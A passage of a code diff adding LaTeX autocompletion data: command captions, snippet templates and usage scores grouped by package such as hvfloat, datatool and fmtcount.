score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hvfloat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'hvfloat-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'hvfloat-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'hvfloat-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'hvfloat-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'hvfloat-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hvfloat-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'hvfloat-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hvfloat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'hvfloat-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'hvfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'hvfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'hvfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'hvfloat-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\DeclareCaptionJustification{}{}', + snippet: '\\DeclareCaptionJustification{$1}{$2}', + meta: 'hvfloat-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\DeclareCaptionLabelSeparator{}{}', + snippet: '\\DeclareCaptionLabelSeparator{$1}{$2}', + meta: 'hvfloat-cmd', + score: 0.0003890810058478364, + }, + { + caption: '\\DeclareCaptionFormat{}{}', + snippet: '\\DeclareCaptionFormat{$1}{$2}', + meta: 'hvfloat-cmd', + score: 0.0004717618449370015, + }, + { + caption: '\\DeclareCaptionFont{}{}', + snippet: '\\DeclareCaptionFont{$1}{$2}', + meta: 'hvfloat-cmd', + score: 5.0133404990680195e-5, + }, + { + caption: '\\DeclareCaptionSubType[]{}', + snippet: '\\DeclareCaptionSubType[$1]{$2}', + meta: 'hvfloat-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hvfloat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hvfloat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'hvfloat-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'hvfloat-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'hvfloat-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\DeclareCaptionType{}[][]', + snippet: '\\DeclareCaptionType{$1}[$2][$3]', + meta: 'hvfloat-cmd', + score: 0.00015256647321237863, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hvfloat-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'hvfloat-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\footnotemark[]', + snippet: '\\footnotemark[$1]', + meta: 'hvfloat-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\footnotemark', + snippet: '\\footnotemark', + meta: 'hvfloat-cmd', + score: 0.021473212893597875, + }, + ], + thmbox: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'thmbox-cmd', + score: 0.00037306820619479756, + }, + ], + proba: [ + { + caption: '\\frak{}', + snippet: '\\frak{$1}', + meta: 'proba-cmd', + score: 0.0017966000518546787, + }, + { + caption: '\\checkmark', + snippet: '\\checkmark', + meta: 'proba-cmd', + score: 0.025060530944368123, + }, + { + caption: '\\bold', + snippet: '\\bold', + meta: 'proba-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\bold{}', + snippet: '\\bold{$1}', + meta: 'proba-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\Bbb{}', + snippet: '\\Bbb{$1}', + meta: 'proba-cmd', + score: 0.0006671850995492977, + }, + { + caption: '\\Bbb', + snippet: '\\Bbb', + meta: 'proba-cmd', + score: 0.0006671850995492977, + }, + ], + datatool: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'datatool-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'datatool-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'datatool-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'datatool-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'datatool-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'datatool-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'datatool-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'datatool-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'datatool-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'datatool-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'datatool-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'datatool-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'datatool-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'datatool-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'datatool-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'datatool-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'datatool-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'datatool-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'datatool-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'datatool-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'datatool-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'datatool-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'datatool-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'datatool-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'datatool-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'datatool-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'datatool-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'datatool-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'datatool-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'datatool-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'datatool-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'datatool-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'datatool-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'datatool-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'datatool-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'datatool-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'datatool-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'datatool-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'datatool-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'datatool-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'datatool-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'datatool-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'datatool-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'datatool-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'datatool-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'datatool-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'datatool-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'datatool-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'datatool-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'datatool-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'datatool-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'datatool-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'datatool-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'datatool-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'datatool-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'datatool-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'datatool-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'datatool-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'datatool-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'datatool-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'datatool-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'datatool-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'datatool-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'datatool-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'datatool-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'datatool-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'datatool-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'datatool-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'datatool-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'datatool-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'datatool-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'datatool-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'datatool-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'datatool-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'datatool-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'datatool-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'datatool-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'datatool-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'datatool-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'datatool-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'datatool-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'datatool-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'datatool-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'datatool-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'datatool-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'datatool-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'datatool-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'datatool-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'datatool-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'datatool-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'datatool-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'datatool-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'datatool-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'datatool-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'datatool-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'datatool-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'datatool-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'datatool-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'datatool-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'datatool-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'datatool-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'datatool-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'datatool-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'datatool-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'datatool-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'datatool-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'datatool-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'datatool-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'datatool-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'datatool-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'datatool-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'datatool-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'datatool-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'datatool-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'datatool-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'datatool-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'datatool-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'datatool-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'datatool-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'datatool-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'datatool-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'datatool-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'datatool-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'datatool-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'datatool-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'datatool-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'datatool-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'datatool-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'datatool-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'datatool-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'datatool-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'datatool-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'datatool-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'datatool-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'datatool-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'datatool-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'datatool-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'datatool-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'datatool-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'datatool-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'datatool-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'datatool-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'datatool-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'datatool-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'datatool-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'datatool-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'datatool-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'datatool-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'datatool-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'datatool-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'datatool-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'datatool-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'datatool-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'datatool-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'datatool-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'datatool-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'datatool-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'datatool-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'datatool-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'datatool-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'datatool-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'datatool-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'datatool-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'datatool-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'datatool-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'datatool-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'datatool-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'datatool-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'datatool-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'datatool-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'datatool-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'datatool-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'datatool-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'datatool-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'datatool-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'datatool-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'datatool-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'datatool-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'datatool-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'datatool-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'datatool-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'datatool-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'datatool-cmd', + score: 0.0063276692758974925, + }, + ], + fmtcount: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'fmtcount-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'fmtcount-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'fmtcount-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'fmtcount-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'fmtcount-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'fmtcount-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'fmtcount-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'fmtcount-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + 